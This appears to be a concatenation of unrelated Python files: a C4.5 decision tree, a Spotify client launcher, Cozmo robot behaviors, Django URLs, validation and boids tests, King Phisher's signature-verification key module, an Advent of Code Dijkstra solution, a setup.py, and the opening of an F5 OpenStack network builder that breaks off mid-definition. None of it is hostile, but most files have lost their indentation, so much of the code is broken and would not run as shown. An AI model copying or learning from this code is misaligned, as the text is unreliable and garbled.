if featVec[axis] == value:
                rFeatVec = featVec[:axis]  # list slice: elements 0 .. axis-1
rFeatVec.extend(featVec[axis + 1:])
rtnList.append(rFeatVec)
return rtnList
    # compute the split information of a feature
def computeSplitInfo(self, featureVList):
numEntries = len(featureVList)
featureValueSetList = list(
set(featureVList))
valueCounts = [featureVList.count(featVec) for featVec in featureValueSetList]
pList = [float(item) / numEntries for item in valueCounts]
lList = [item * math.log(item, 2) for item in pList]
splitInfo = -sum(lList)
return splitInfo, featureValueSetList
    # select the best feature by gain ratio
def getBestFeat(self, dataSet):
Num_Feats = len(dataSet[0][:-1]) # 4
totality = len(dataSet) # 1024
BaseEntropy = self.computeEntropy(dataSet)
ConditionEntropy = []
splitInfo = []
allFeatVList = []
for f in range(Num_Feats):
featList = [example[f] for example in dataSet]
[splitI, featureValueList] = self.computeSplitInfo(featList)
allFeatVList.append(featureValueList) # ['0','1','2'],['0','1','2'],['0','1']
splitInfo.append(splitI)
resultGain = 0.0
for value in featureValueList:
subSet = self.splitDataSet(dataSet, f, value)
appearNum = float(len(subSet))
subEntropy = self.computeEntropy(subSet)
resultGain += (appearNum / totality) * subEntropy
ConditionEntropy.append(resultGain)
infoGainArray = BaseEntropy * ones(Num_Feats) - array(ConditionEntropy)
# infoGainRatio = infoGainArray / array(splitInfo)
infoGainRatio = array([0 if j == 0 else i / j for i, j in zip(infoGainArray, splitInfo)])
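        # C4.5 gain ratio: GainRatio(A) = (H(D) - H(D|A)) / SplitInfo(A); the guard above
        # avoids dividing by zero when a feature takes only a single value (SplitInfo == 0).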
bestFeatureIndex = argsort(-infoGainRatio)[0]
return bestFeatureIndex, allFeatVList[bestFeatureIndex]
    def predict(self, inputTree, featLabels, testVec):  # classifier
        root = list(inputTree.keys())[0]
        secondDict = inputTree[root]  # value is either a subtree or a class label
        featIndex = featLabels.index(root)  # position of the root feature in the label list
        key = testVec[featIndex]
        valueOfFeat = secondDict[key]  # error-prone spot: valueOfFeat = secondDict[key]
        if isinstance(valueOfFeat, dict):
            classLabel = self.predict(valueOfFeat, featLabels, testVec)  # recurse into the subtree
else:
classLabel = valueOfFeat
return classLabel
def storeTree(self, inputTree, filename):
fw = open(filename, 'wb')
        # persist the tree object with pickle
pickle.dump(inputTree, fw)
fw.close()
def grabTree(self, filename):
fr = open(filename, 'rb')
return pickle.load(fr)
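# Hypothetical usage sketch (file path, labels and separator are placeholders):
# dtree = C4_5DTree()
# dtree.loadDataSet("dataset.dat", ["age", "income", "student", "credit"], "\t")
# dtree.train()
# print(dtree.predict(dtree.tree, dtree.labels, ["0", "1", "0", "0"]))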
|
python
|
import logging
import subprocess
import sys
class Spotify():
def __init__(self, args):
logging.info("Spotify Connect client started.")
command = "spotifyd --no-daemon"
self.process = subprocess.Popen(command, shell=True)
def stop(self):
self.process.kill()
logging.info("Stopped Spotify Connect client.")
|
python
|
# Copyright (c) 2016 Anki, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License in the file LICENSE.txt or at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''
Behaviors represent a task that Cozmo may perform for an
indefinite amount of time.
For example, the "LookAroundInPlace" behavior causes Cozmo to start looking
around him (without driving), which will cause events such as
:class:`cozmo.objects.EvtObjectObserved` to be generated as he comes across
objects.
Behaviors must be explicitly stopped before having the robot do something else
(for example, pick up the object he just observed).
Behaviors are started by a call to :meth:`cozmo.robot.Robot.start_behavior`,
which returns a :class:`Behavior` object. Calling the :meth:`~Behavior.stop`
method on that object terminates the behavior.
The :class:`BehaviorTypes` class in this module holds a list of all available
behaviors.
'''
# __all__ should order by constants, event classes, other classes, functions.
__all__ = ['BEHAVIOR_IDLE', 'BEHAVIOR_REQUESTED', 'BEHAVIOR_RUNNING',
'BEHAVIOR_STOPPED',
'EvtBehaviorRequested', 'EvtBehaviorStarted', 'EvtBehaviorStopped',
'Behavior', 'BehaviorTypes']
import collections
from . import logger
from . import event
from ._clad import _clad_to_engine_cozmo, CladEnumWrapper
#: string: Behavior idle state (not requested to run)
BEHAVIOR_IDLE = 'behavior_idle'
#: string: Behavior requested state (waiting for engine to start it)
BEHAVIOR_REQUESTED = 'behavior_requested'
#: string: Behavior running state
BEHAVIOR_RUNNING = 'behavior_running'
#: string: Behavior stopped state
BEHAVIOR_STOPPED = 'behavior_stopped'
class EvtBehaviorRequested(event.Event):
'''Triggered when a behavior is requested to start.'''
behavior = 'The Behavior object'
behavior_type_name = 'The behavior type name - equivalent to behavior.type.name'
class EvtBehaviorStarted(event.Event):
'''Triggered when a behavior starts running on the robot.'''
behavior = 'The Behavior object'
behavior_type_name = 'The behavior type name - equivalent to behavior.type.name'
class EvtBehaviorStopped(event.Event):
'''Triggered when a behavior stops.'''
behavior = 'The behavior type object'
behavior_type_name = 'The behavior type name - equivalent to behavior.type.name'
class Behavior(event.Dispatcher):
'''A Behavior instance describes a behavior the robot is currently performing.
Returned by :meth:`cozmo.robot.Robot.start_behavior`.
'''
def __init__(self, robot, behavior_type, is_active=False, **kw):
super().__init__(**kw)
self.robot = robot
self.type = behavior_type
self._state = BEHAVIOR_IDLE
if is_active:
self._state = BEHAVIOR_REQUESTED
self.dispatch_event(EvtBehaviorRequested, behavior=self, behavior_type_name=self.type.name)
def __repr__(self):
return '<%s type="%s">' % (self.__class__.__name__, self.type.name)
def _on_engine_started(self):
if self._state != BEHAVIOR_REQUESTED:
# has not been requested (is an unrelated behavior transition)
if self.is_running:
logger.warning("Behavior '%s' unexpectedly reported started when already running")
return
self._state = BEHAVIOR_RUNNING
self.dispatch_event(EvtBehaviorStarted, behavior=self, behavior_type_name=self.type.name)
def _set_stopped(self):
if not self.is_active:
return
self._state = BEHAVIOR_STOPPED
self.dispatch_event(EvtBehaviorStopped, behavior=self, behavior_type_name=self.type.name)
def stop(self):
'''Requests that the robot stop performing the behavior.
Has no effect if the behavior is not presently active.
'''
if not self.is_active:
return
self.robot._set_none_behavior()
self._set_stopped()
@property
def is_active(self):
'''bool: True if the behavior is currently active and may run on the robot.'''
return self._state == BEHAVIOR_REQUESTED or self._state == BEHAVIOR_RUNNING
@property
def is_running(self):
'''bool: True if the behavior is currently running on the robot.'''
return self._state == BEHAVIOR_RUNNING
@property
def is_completed(self):
return self._state == BEHAVIOR_STOPPED
async def wait_for_started(self, timeout=5):
'''Waits for the behavior to start.
Args:
timeout (int or None): Maximum time in seconds to wait for the event.
Pass None to wait indefinitely. If a behavior can run it should
usually start within ~0.2 seconds.
Raises:
:class:`asyncio.TimeoutError`
'''
if self.is_running or self.is_completed:
# Already started running
return
await self.wait_for(EvtBehaviorStarted, timeout=timeout)
async def wait_for_completed(self, timeout=None):
'''Waits for the behavior to complete.
Args:
timeout (int or None): Maximum time in seconds to wait for the event.
Pass None to wait indefinitely.
Raises:
:class:`asyncio.TimeoutError`
'''
if self.is_completed:
# Already complete
return
# Wait for behavior to start first - it can't complete without starting,
# and if it doesn't start within a fraction of a second it probably
# never will
await self.wait_for_started()
await self.wait_for(EvtBehaviorStopped, timeout=timeout)
_BehaviorType = collections.namedtuple('_BehaviorType', ['name', 'id'])
class BehaviorTypes(CladEnumWrapper):
'''Defines all executable robot behaviors.
For use with :meth:`cozmo.robot.Robot.start_behavior`.
'''
_clad_enum = _clad_to_engine_cozmo.ExecutableBehaviorType
_entry_type = _BehaviorType
#: Turn and move head, but don't drive, with Cozmo's head angled
#: upwards where faces are likely to be.
FindFaces = _entry_type("FindFaces", _clad_enum.FindFaces)
#: Knock over a stack of cubes.
KnockOverCubes = _entry_type("KnockOverCubes", _clad_enum.KnockOverCubes)
#: Turn and move head, but don't drive, to see what is around Cozmo.
LookAroundInPlace = _entry_type("LookAroundInPlace", _clad_enum.LookAroundInPlace)
#: Tries to "pounce" (drive forward and lower lift) when it detects
#: nearby motion on the ground plane.
PounceOnMotion = _entry_type("PounceOnMotion", _clad_enum.PounceOnMotion)
#: Roll a block, regardless of orientation.
RollBlock = _entry_type("RollBlock", _clad_enum.RollBlock)
#: Pickup one block, and stack it onto another block.
StackBlocks = _entry_type("StackBlocks", _clad_enum.StackBlocks)
# Enroll a Face - for internal use by Face.name_face (requires additional pre/post setup)
_EnrollFace = _entry_type("EnrollFace", _clad_enum.EnrollFace)
# This enum deliberately only exposes a sub-set of working behaviors
BehaviorTypes._init_class(warn_on_missing_definitions=False, add_missing_definitions=False)
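# Minimal usage sketch based on the module docstring above (assumes an already
# connected cozmo.robot.Robot instance named `robot`):
#
# behavior = robot.start_behavior(BehaviorTypes.LookAroundInPlace)
# ...  # let the behavior run, then stop it before giving the robot other commands
# behavior.stop()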
|
python
|
# -*- coding: utf-8 -*-
from django.conf.urls import url, include
from django.contrib.auth.decorators import login_required
from children.views import ChildrenTemplateView, ChildrenDetailView, ChildrenUpdateView
from children.views import ChildrenCreateView, ChildrenDeleteView, ChildListJson
urlpatterns = [
url(r'^$', ChildrenTemplateView.as_view(), name='list'),
url(r'^add/$', ChildrenCreateView.as_view(), name='add'),
url(r'^(?P<child_id>[0-9]+)/$', ChildrenDetailView.as_view(), name='detail'),
url(r'^(?P<child_id>[0-9]+)/edit/$', ChildrenUpdateView.as_view(), name='edit'),
url(r'^(?P<child_id>[0-9]+)/delete/$', ChildrenDeleteView.as_view(), name='delete'),
url(r'^(?P<child_id>[0-9]+)/params/', include('history.urls')),
url(r'^data-table/$', login_required(ChildListJson.as_view()), name='child_list_json')
]
|
python
|
from biosimulators_utils.model_lang.bngl.validation import validate_model, read_model
from biosimulators_utils.utils.core import flatten_nested_list_of_strings
import os
import shutil
import tempfile
import unittest
class BgnlValidationTestCase(unittest.TestCase):
FIXTURE_DIR = os.path.join(os.path.dirname(__file__), '..', '..', 'fixtures', 'bngl')
def test(self):
errors, warnings, _ = validate_model(os.path.join(self.FIXTURE_DIR, 'valid.bngl'))
self.assertEqual(errors, [])
self.assertEqual(warnings, [])
fid, filename = tempfile.mkstemp()
os.close(fid)
shutil.copyfile(os.path.join(self.FIXTURE_DIR, 'valid.bngl'), filename)
errors, warnings, _ = validate_model(filename)
self.assertEqual(errors, [])
self.assertEqual(warnings, [])
os.remove(filename)
filename = os.path.join(self.FIXTURE_DIR, 'invalid.bngl2')
_, errors, _ = read_model(filename, '')
self.assertIn("not a valid BNGL or BGNL XML file", flatten_nested_list_of_strings(errors))
filename = os.path.join(self.FIXTURE_DIR, 'invalid.bngl')
errors, warnings, _ = validate_model(filename)
self.assertIn("not a valid BNGL", flatten_nested_list_of_strings(errors))
self.assertEqual(warnings, [])
filename = os.path.join(self.FIXTURE_DIR, 'does-not-exist')
errors, warnings, _ = validate_model(filename)
self.assertIn('is not a file', flatten_nested_list_of_strings(errors))
self.assertEqual(warnings, [])
filename = None
errors, warnings, _ = validate_model(filename)
self.assertIn('must be a path', flatten_nested_list_of_strings(errors))
self.assertEqual(warnings, [])
filename = os.path.join(self.FIXTURE_DIR, '..', 'BIOMD0000000075.xml')
errors, warnings, _ = validate_model(filename)
self.assertIn('does not appear to a valid', flatten_nested_list_of_strings(errors))
self.assertEqual(warnings, [])
|
python
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# king_phisher/security_keys.py
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import binascii
import copy
import hashlib
import json
import logging
from king_phisher import find
from king_phisher import serializers
from king_phisher import utilities
import cryptography.hazmat.primitives.ciphers
import cryptography.hazmat.primitives.ciphers.algorithms
import cryptography.hazmat.primitives.ciphers.modes
import cryptography.hazmat.primitives.padding as padding
import cryptography.hazmat.backends as backends
import ecdsa
import ecdsa.curves
import ecdsa.keys
ciphers = cryptography.hazmat.primitives.ciphers
ecdsa_curves = dict((c.name, c) for c in ecdsa.curves.curves)
"""
A dictionary of :py:class:`ecdsa.curves.Curve` objects keyed by their
:py:mod:`ecdsa` and OpenSSL compatible names.
"""
ecdsa_curves.update((c.openssl_name, c) for c in ecdsa.curves.curves)
def _decode_data(value, encoding=None):
if isinstance(encoding, str):
encoding = encoding.lower()
if encoding == 'base64':
value = binascii.a2b_base64(value)
elif encoding == 'hex':
value = binascii.a2b_hex(value)
elif encoding is not None:
raise ValueError('unknown encoding: ' + encoding)
return value
def _encoding_data(value, encoding=None):
if isinstance(encoding, str):
encoding = encoding.lower()
if encoding == 'base64':
value = binascii.b2a_base64(value).decode('utf-8').strip()
elif encoding == 'hex':
value = binascii.b2a_hex(value).decode('utf-8').strip()
elif encoding is not None:
raise ValueError('unknown encoding: ' + encoding)
return value
def _key_cls_from_dict(cls, value, encoding=None):
key_data = _decode_data(value['data'], encoding=encoding)
return cls.from_string(key_data, curve=value['type'])
def _kwarg_curve(kwargs):
if 'curve' not in kwargs:
return kwargs
curve = kwargs.pop('curve')
if isinstance(curve, str):
if curve not in ecdsa_curves:
raise ValueError('unknown curve: ' + curve)
curve = ecdsa_curves[curve]
elif not isinstance(curve, ecdsa.curves.Curve):
raise TypeError('curve must either be a curve name or ecdsa.curves.Curve instance')
kwargs['curve'] = curve
return kwargs
def openssl_decrypt_data(ciphertext, password, digest='sha256', encoding='utf-8'):
"""
Decrypt *ciphertext* in the same way as OpenSSL. For the meaning of
*digest* see the :py:func:`.openssl_derive_key_and_iv` function
documentation.
.. note::
This function can be used to decrypt ciphertext created with the
``openssl`` command line utility.
.. code-block:: none
openssl enc -e -aes-256-cbc -in file -out file.enc -md sha256
:param bytes ciphertext: The encrypted data to decrypt.
:param str password: The password to use when deriving the decryption key.
:param str digest: The name of hashing function to use to generate the key.
:param str encoding: The name of the encoding to use for the password.
:return: The decrypted data.
:rtype: bytes
"""
salt = b''
if ciphertext[:8] == b'Salted__':
salt = ciphertext[8:16]
ciphertext = ciphertext[16:]
my_key, my_iv = openssl_derive_key_and_iv(password, salt, 32, 16, digest=digest, encoding=encoding)
cipher = ciphers.Cipher(
ciphers.algorithms.AES(my_key),
ciphers.modes.CBC(my_iv),
backend=backends.default_backend()
)
decryptor = cipher.decryptor()
plaintext = decryptor.update(ciphertext) + decryptor.finalize()
unpadder = padding.PKCS7(cipher.algorithm.block_size).unpadder()
return unpadder.update(plaintext) + unpadder.finalize()
def openssl_derive_key_and_iv(password, salt, key_length, iv_length, digest='sha256', encoding='utf-8'):
"""
Derive an encryption key and initialization vector (IV) in the same way as
OpenSSL.
.. note::
Different versions of OpenSSL use a different default value for the
*digest* function used to derive keys and initialization vectors. A
specific one can be used by passing the ``-md`` option to the
``openssl`` command.
:param str password: The password to use when deriving the key and IV.
:param bytes salt: A value to use as a salt for the operation.
:param int key_length: The length in bytes of the key to return.
:param int iv_length: The length in bytes of the IV to return.
:param str digest: The name of hashing function to use to generate the key.
:param str encoding: The name of the encoding to use for the password.
:return: The key and IV as a tuple.
:rtype: tuple
"""
password = password.encode(encoding)
digest_function = getattr(hashlib, digest)
chunk = b''
data = b''
while len(data) < key_length + iv_length:
chunk = digest_function(chunk + password + salt).digest()
data += chunk
return data[:key_length], data[key_length:key_length + iv_length]
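# Editorial example (not part of the original module): a minimal sketch showing
# how the two helpers above decrypt a file produced with the ``openssl`` CLI,
# e.g. ``openssl enc -e -aes-256-cbc -in file -out file.enc -md sha256``.
# The file path and password below are hypothetical.
def _example_openssl_decrypt(path='file.enc', password='secret'):
	with open(path, 'rb') as file_h:
		ciphertext = file_h.read()
	# openssl_decrypt_data strips the 'Salted__' header, derives the key and IV
	# with openssl_derive_key_and_iv, decrypts with AES-256-CBC and removes the
	# PKCS7 padding
	return openssl_decrypt_data(ciphertext, password, digest='sha256')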
class SigningKey(ecdsa.SigningKey, object):
@classmethod
def from_secret_exponent(cls, *args, **kwargs):
instance = super(SigningKey, cls).from_secret_exponent(*args, **kwargs)
orig_vk = instance.verifying_key
instance.verifying_key = VerifyingKey.from_public_point(orig_vk.pubkey.point, instance.curve, instance.default_hashfunc)
return instance
@classmethod
def from_string(cls, string, **kwargs):
kwargs = _kwarg_curve(kwargs)
return super(SigningKey, cls).from_string(string, **kwargs)
@classmethod
def from_dict(cls, value, encoding='base64'):
"""
Load the signing key from the specified dict object.
:param dict value: The dictionary to load the key data from.
:param str encoding: The encoding of the required 'data' key.
:return: The new signing key.
:rtype: :py:class:`.SigningKey`
"""
return _key_cls_from_dict(cls, value, encoding=encoding)
@classmethod
def from_file(cls, file_path, password=None, encoding='utf-8'):
"""
Load the signing key from the specified file. If *password* is
specified, the file is assumed to have been encoded using OpenSSL using
``aes-256-cbc`` with ``sha256`` as the message digest.
:param str file_path: The path to the file to load.
:param str password: An optional password to use for decrypting the file.
:param str encoding: The encoding of the data.
:return: A tuple of the key's ID, and the new :py:class:`.SigningKey` instance.
:rtype: tuple
"""
with open(file_path, 'rb') as file_h:
file_data = file_h.read()
if password:
file_data = openssl_decrypt_data(file_data, password, encoding=encoding)
file_data = file_data.decode(encoding)
file_data = serializers.JSON.loads(file_data)
utilities.validate_json_schema(file_data, 'king-phisher.security.key')
return file_data['id'], cls.from_dict(file_data['signing-key'], encoding=file_data.pop('encoding', 'base64'))
def sign_dict(self, data, signature_encoding='base64'):
"""
Sign a dictionary object. The dictionary will have a 'signature' key
		added, as required by the :py:meth:`.VerifyingKey.verify_dict` method.
To serialize the dictionary to data suitable for the operation the
:py:func:`json.dumps` function is used and the resulting data is then
UTF-8 encoded.
:param dict data: The dictionary of data to sign.
:param str signature_encoding: The encoding name of the signature data.
:return: The dictionary object is returned with the 'signature' key added.
"""
utilities.assert_arg_type(data, dict, arg_pos=1)
data = copy.copy(data)
data.pop('signature', None) # remove a pre-existing signature
json_data = json.dumps(data, sort_keys=True).encode('utf-8')
data['signature'] = _encoding_data(self.sign(json_data), encoding=signature_encoding)
return data
class VerifyingKey(ecdsa.VerifyingKey, object):
@classmethod
def from_string(cls, string, **kwargs):
kwargs = _kwarg_curve(kwargs)
return super(VerifyingKey, cls).from_string(string, **kwargs)
@classmethod
def from_dict(cls, value, encoding='base64'):
return _key_cls_from_dict(cls, value, encoding=encoding)
def verify_dict(self, data, signature_encoding='base64'):
"""
Verify a signed dictionary object. The dictionary must have a
'signature' key as added by the :py:meth:`.SigningKey.sign_dict`
method. To serialize the dictionary to data suitable for the operation
the :py:func:`json.dumps` function is used and the resulting data is
then UTF-8 encoded.
:param dict data: The dictionary of data to verify.
:param str signature_encoding: The encoding name of the signature data.
"""
utilities.assert_arg_type(data, dict, arg_pos=1)
data = copy.copy(data)
signature = _decode_data(data.pop('signature'), encoding=signature_encoding)
data = json.dumps(data, sort_keys=True).encode('utf-8')
return self.verify(signature, data)
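# Editorial example (not part of the original module): a minimal sign/verify
# round trip using the subclasses above. The curve choice and message are
# illustrative assumptions only.
def _example_sign_and_verify():
	signing_key = SigningKey.generate(curve=ecdsa.curves.NIST256p)
	signed = signing_key.sign_dict({'message': 'hello world'})
	# rebuild the public key as the local VerifyingKey subclass so that
	# verify_dict() is available
	verifying_key = VerifyingKey.from_string(
		signing_key.get_verifying_key().to_string(),
		curve='NIST256p'
	)
	# verify_dict raises ecdsa.keys.BadSignatureError if the signature is bad
	return verifying_key.verify_dict(signed)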
class SecurityKeys(object):
"""
The security keys that are installed on the system. These are then used to
validate the signatures of downloaded files to ensure they have not been
corrupted or tampered with.
.. note::
Keys are first loaded from the security.json file included with the
application source code and then from an optional security.local.json
		file. Keys loaded from the optional file cannot overwrite keys loaded
from the system file.
"""
logger = logging.getLogger('KingPhisher.SecurityKeys')
def __init__(self):
self.keys = utilities.FreezableDict()
"""The dictionary of the loaded security keys, keyed by their identity string."""
if not self._load_key_store('security.json'):
raise RuntimeError('failed to load any keys from the primary store')
self._load_key_store('security.local.json')
self.keys.freeze()
self.logger.info("security key store initialized with {0:,} keys".format(len(self.keys)))
def _get_verifying_key(self, key_id):
key = self.keys.get(key_id)
if key is None:
self.logger.warning("verification of data with key {0} failed (unknown key)".format(key_id))
raise ecdsa.keys.BadSignatureError('unknown key for signature')
verifying_key = key.get('verifying-key')
if verifying_key is None:
self.logger.warning("verification of data with key {0} failed (missing verifying-key)".format(key_id))
raise ecdsa.keys.BadSignatureError('unknown key for signature')
return verifying_key
def _load_key_store(self, file_name):
file_path = find.data_file(file_name)
if not file_path:
return 0
with open(file_path, 'r') as file_h:
key_store = serializers.JSON.load(file_h)
utilities.validate_json_schema(key_store, 'king-phisher.security')
key_store = key_store['keys']
loaded = 0
for key_idx, key in enumerate(key_store, 1):
identifier = key['id']
if identifier in self.keys:
self.logger.warning("skipping loading {0}:{1} due to a duplicate id".format(file_name, key_idx))
continue
verifying_key = key['verifying-key']
key['verifying-key'] = VerifyingKey.from_dict(verifying_key, encoding=verifying_key.pop('encoding', 'base64'))
self.keys[identifier] = key
self.logger.debug("loaded key id: {0} from: {1}".format(identifier, file_path))
loaded += 1
return loaded
def verify(self, key_id, data, signature):
"""
Verify the data with the specified signature as signed by the specified
key. This function will raise an exception if the verification fails
for any reason, including if the key can not be found.
:param str key_id: The key's identifier.
:param bytes data: The data to verify against the signature.
:param bytes signature: The signature of the data to verify.
"""
verifying_key = self._get_verifying_key(key_id)
return verifying_key.verify(signature, data)
def verify_dict(self, data, signature_encoding='base64'):
"""
Verify the signed dictionary, using the key specified within the
'signed-by' key. This function will raise an exception if the
verification fails for any reason, including if the key can not be
found.
		:param dict data: The dictionary of data to verify.
		:param str signature_encoding: The encoding name of the signature data.
"""
key_id = data['signed-by']
verifying_key = self._get_verifying_key(key_id)
return verifying_key.verify_dict(data, signature_encoding=signature_encoding)
|
python
|
import sys
nodes = []
class node:
    def __init__(self, v):
        self.value = v
        self.visited = False
        self.dist = 2e30
        self.prev = None
        self.idx = -1
        # filled in after the full grid has been built
        self.neighbors = []
def getNeighbors(x,y,input):
result = []
    if y>0:
result.append(input[y-1][x])
if y+1<len(input):
result.append(input[y+1][x])
    if x>0:
result.append(input[y][x-1])
if x+1<len(input[y]):
result.append(input[y][x+1])
return result
def loadFile(part2 = False):
f = open("Day15\\Input.txt", "r")
nodes.clear()
for x in f:
x = x.strip()
row = []
for y in x:
row.append(node(int(y)))
if part2:
wid = len(row)
for i in range(1,5):
for j in range(wid):
v = row[j].value+i
if v > 9:
v-=9
row.append(node(v))
nodes.append(row)
if part2:
hei = len(nodes)
for i in range(1,5):
for j in range(hei):
row = []
for n in nodes[j]:
v = n.value+i
if v > 9:
v-=9
row.append(node(v))
nodes.append(row)
for y in range(len(nodes)):
for x in range(len(nodes[y])):
nodes[y][x].neighbors = getNeighbors(x,y,nodes)
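# Editorial note: for part 2 the original grid is tiled 5x5; each tile adds its
# tile index to the risk value and wraps anything above 9 back into 1..9, so an
# original 8 becomes 9, 1, 2, 3 in the next four tiles to the right.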
class priorityQueue:
    def __init__(self):
        # per-instance queue (a class-level list would be shared between runs)
        self.queue = []
def updateNode(self,node):
idx = node.idx
if(idx <1):
return
while( idx>0 and self[idx].dist<self[idx-1].dist):
temp = self[idx]
self[idx] = self[idx-1]
self[idx-1] = temp
self[idx-1].idx = idx-1
self[idx].idx = idx
idx -= 1
def __getitem__(self,key):
return self.queue[key]
def __setitem__(self,key,value):
self.queue[key] = value
def popfront(self):
result = self[0]
for i in range(1,len(self.queue)):
self[i].idx -= 1
self[i-1] = self[i]
self.queue.pop()
result.idx = -1
return result
def addNode(self, node):
node.idx = len(self.queue)
self.queue.append(node)
def Dijkstra():
Q = priorityQueue()
source = 0
for y in range(len(nodes)):
for x in range(len(nodes[y])):
Q.addNode(nodes[y][x])
target = Q.queue[-1]
Q.queue[0].dist = 0
while len(Q.queue)>0:
u = Q.popfront()
if u == target:
break
for n in u.neighbors:
d2 = u.dist+n.value
if d2 < n.dist:
n.dist = d2
n.prev = u
Q.updateNode(n)
return target.dist
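# Editorial alternative (not part of the original solution): the same search
# using the standard library's heapq instead of the hand-rolled priority queue
# above; it reads the same global `nodes` grid built by loadFile().
import heapq
def dijkstra_heapq():
    start = nodes[0][0]
    target = nodes[-1][-1]
    best = {id(start): 0}
    heap = [(0, 0, start)]  # (distance, tie-breaker, node)
    counter = 1
    while heap:
        d, _, u = heapq.heappop(heap)
        if u is target:
            return d
        if d > best.get(id(u), 2e30):
            continue  # stale queue entry
        for n in u.neighbors:
            nd = d + n.value
            if nd < best.get(id(n), 2e30):
                best[id(n)] = nd
                heapq.heappush(heap, (nd, counter, n))
                counter += 1
    return best.get(id(target), 2e30)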
def part1():
loadFile()
risk = Dijkstra()
print( f"Part 1: Risk:{risk}")
def part2():
loadFile(True)
risk = Dijkstra()
print( f"Part 2: Risk:{risk}")
part1()
#part2()
|
python
|
#!/usr/bin/env python
from distutils.core import setup
setup(name='Ignition',
version='0.1.8',
description='Run multiple programs in a specific order and monitor their state',
author='Luka Cehovin',
author_email='[email protected]',
url='https://github.com/lukacu/ignition/',
packages=['ignition'],
scripts=["bin/ignite"],
requires=[],
)
|
python
|
from ..class_boids import Boids
import numpy as np
from nose.tools import assert_equal,assert_almost_equal
import os
import yaml
def init_trial_boids():
pathtofile = 'fixtures/regression_fixtures.yml'
    data = yaml.safe_load(open(
        os.path.join(os.path.dirname(__file__), pathtofile)))
pos_start = [data['before'][0],data['before'][1]]
vel_start = [data['before'][2],data['before'][3]]
test_boids = Boids(pos_start,vel_start)
return test_boids
def check_func(test_boids,pathtofile):
test_boids.increment_positions()
    answer = yaml.safe_load(open(
        os.path.join(os.path.dirname(__file__), pathtofile)))
# assert_almost_equal cannot evaluate arrays
# therefore we iterate through all elements
for j in range(test_boids.Nboids):
for i in range(2):
assert_almost_equal(test_boids.positions[i][j],
answer['positions'][i][j],delta=0.01)
assert_almost_equal(test_boids.velocities[i][j],
answer['velocities'][i][j],delta=0.01)
def test_fly_towards_middle():
test_boids = init_trial_boids()
test_boids.fly_towards_middle(0.01)
check_func(test_boids,'fixtures/fly_towards_middle.yml')
def test_avoid_nearby_boids():
test_boids = init_trial_boids()
test_boids.avoid_nearby_boids(100)
check_func(test_boids,'fixtures/avoid_nearby_birds.yml')
def test_match_speeds():
test_boids = init_trial_boids()
test_boids.match_speeds(0.125,1000)
check_func(test_boids,'fixtures/match_speeds.yml')
|
python
|
# Copyright (c) 2014-2018, F5 Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import itertools
import netaddr
from requests import HTTPError
from oslo_log import log as logging
from f5_openstack_agent.lbaasv2.drivers.bigip import constants_v2
from f5_openstack_agent.lbaasv2.drivers.bigip import exceptions as f5_ex
from f5_openstack_agent.lbaasv2.drivers.bigip.l2_service import \
L2ServiceBuilder
from f5_openstack_agent.lbaasv2.drivers.bigip.network_helper import \
NetworkHelper
from f5_openstack_agent.lbaasv2.drivers.bigip import resource_helper
from f5_openstack_agent.lbaasv2.drivers.bigip.selfips import BigipSelfIpManager
from f5_openstack_agent.lbaasv2.drivers.bigip.snats import BigipSnatManager
from f5_openstack_agent.lbaasv2.drivers.bigip.utils import strip_domain_address
LOG = logging.getLogger(__name__)
class NetworkServiceBuilder(object):
def __init__(self, f5_global_routed_mode, conf, driver, l3_binding=None):
self.f5_global_routed_mode = f5_global_routed_mode
self.conf = conf
self.driver = driver
self.l3_binding = l3_binding
self.l2_service = L2ServiceBuilder(driver, f5_global_routed_mode)
self.bigip_selfip_manager = BigipSelfIpManager(
self.driver, self.l2_service, self.driver.l3_binding)
self.bigip_snat_manager = BigipSnatManager(
self.driver, self.l2_service, self.driver.l3_binding)
self.vlan_manager = resource_helper.BigIPResourceHelper(
resource_helper.ResourceType.vlan)
self.rds_cache = {}
self.interface_mapping = self.l2_service.interface_mapping
self.network_helper = NetworkHelper(conf=self.conf)
self.service_adapter = self.driver.service_adapter
def post_init(self):
# Run and Post Initialization Tasks
# run any post initialized tasks, now that the agent
# is fully connected
self.l2_service.post_init()
def tunnel_sync(self, tunnel_ips):
self.l2_service.tunnel_sync(tunnel_ips)
def set_tunnel_rpc(self, tunnel_rpc):
